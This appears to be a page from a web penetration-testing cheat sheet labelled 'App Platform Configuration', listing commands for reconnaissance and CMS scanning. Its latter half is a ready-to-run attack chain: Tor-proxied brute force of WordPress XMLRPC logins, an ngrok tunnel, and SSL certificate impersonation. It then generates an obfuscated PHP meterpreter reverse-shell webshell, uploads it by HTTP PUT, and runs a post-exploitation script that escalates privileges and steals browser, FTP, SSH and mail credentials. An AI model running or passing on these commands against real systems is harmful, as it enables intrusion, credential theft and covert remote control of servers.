App Platform Configuration

Check List

Ensure that defaults and known files have been removed.
Validate that no debugging code or extensions are left in the production environments.
Review the logging mechanisms set in place for the application.

Cheat Sheet

Sample and Known Files and Directories

Multitor

20 Tor Tunnel

multitor --init 20 --user debian-tor --socks-port 9000 --control-port 9900 --proxy privoxy

Nikto

Scan Web Server

nikto -h $WEBSITE

Subfinder

Subdomain Fuzzing

subfinder -all -silent -d $WEBSITE -o /tmp/subfinder.txt

Httpx

Check Http Live

cat /tmp/subfinder.txt | httpx -silent -sc -probe -title -td -ip -t 90 -mc 200,404,403,302,301,303,304,305,306,307,302 -o /tmp/subdomains.txt

Dirsearch

Directory Fuzzing

dirsearch -l /tmp/subdomains.txt -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent

Nuclei

List all Tags

nuclei -tgl

Scan OSINT & Recon

nuclei -u $WEBSITE -tags osint enum recon

Scan CVEs & Vulnerabilities

nuclei -u $WEBSITE -tags cves detect vulnerabilities

Scan CVEs with Multitor

nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379

Scan Misconf & Panel

nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panel

XSS & SQLi & LFI & RCE & SSRF

nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserialization

WPScan

Scan General

wpscan --url $WEBSITE --rua --api-token $TOKEN

Scan with Multitor

wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379

Enum Users

wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, m

Enum Plugins

wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, p

Enum Themes

wpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, t

Enum Config Backups

wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, tt

Joomscan

Scan General

joomscan -u $WEBSITE --random-agent

Scan with Multitor

joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379

Enum Endpoints

joomscan -u $WEBSITE --random-agent -ec

Droopescan

Scan General

droopescan scan drupal -u $WEBSITE

Enum Endpoints

droopescan scan drupal -u $WEBSITE --enumerate a

Drupwn

Scan General

drupwn --mode exploit --target $WEBSITE

Enum Endpoints

drupwn --mode enum --modules --target $WEBSITE

Enum Users

drupwn --mode enum --users --target $WEBSITE

SPartan

Scan SharePoint

spartan -u $WEBSITE --sps --users -s

IIS-ShortName-Scanner

Scan & Enum IIS

iis_shortname_scanner 2 20 $WEBSITE

Comment Review

Katana

HTML Sources

katana -u $WEBSITE

JS Sources

katana -u $WEBSITE | grep "\.js$"

CSS Sources

katana -u $WEBSITE | grep "\.css*"

System Configuration

Lynis (Linux)

lynis

Hardentools (Windows)

hardentools-cli.exe

Configuration Review

Nmap

HTTP Methods

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

Metasploit

PingBack XMLRPC

msfconsole -qx "use auxiliary/scanner/http/wordpress_pingback_access;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;run;exit"

Brute force XMLRPC with Multitor

msfconsole -qx "use scanner/http/wordpress_xmlrpc_login;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set USERNAME admin;set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;set THREADS 10;set STOP_ON_SUCCESS true;set Proxies socks4:127.0.0.1:16379;run;exit"

Scan PUT Methods

msfconsole -qx "use auxiliary/scanner/http/http_put;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set PATH /wp-content/uploads;run -j"

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*;msfconsole -qx "use auxiliary/gather/impersonate_ssl;set RHOSTS google.com;run;exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
bg
EOF

Generate Webshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=$NGHOST PORT=$NGPORT HandlerSSLCert=/root/.msf4/loot/$CERT StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=StagedPHP EnableStageEncoding=true -f raw -e php/base64 -i 3 -o /tmp/unk9vvn.php;sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php;sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Listening Metasploit

msfconsole -qx "use multi/handler;set PAYLOAD php/meterpreter/reverse_tcp;set LHOST $NGHOST;set LPORT $NGPORT;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Upload Shell PUT Method

curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.php

Logging

Commix

Code Injection

commix -u $WEBSITE

PreviousNetwork Configuration NextFile Extensions Handling

Last updated 20 days ago

Was this helpful?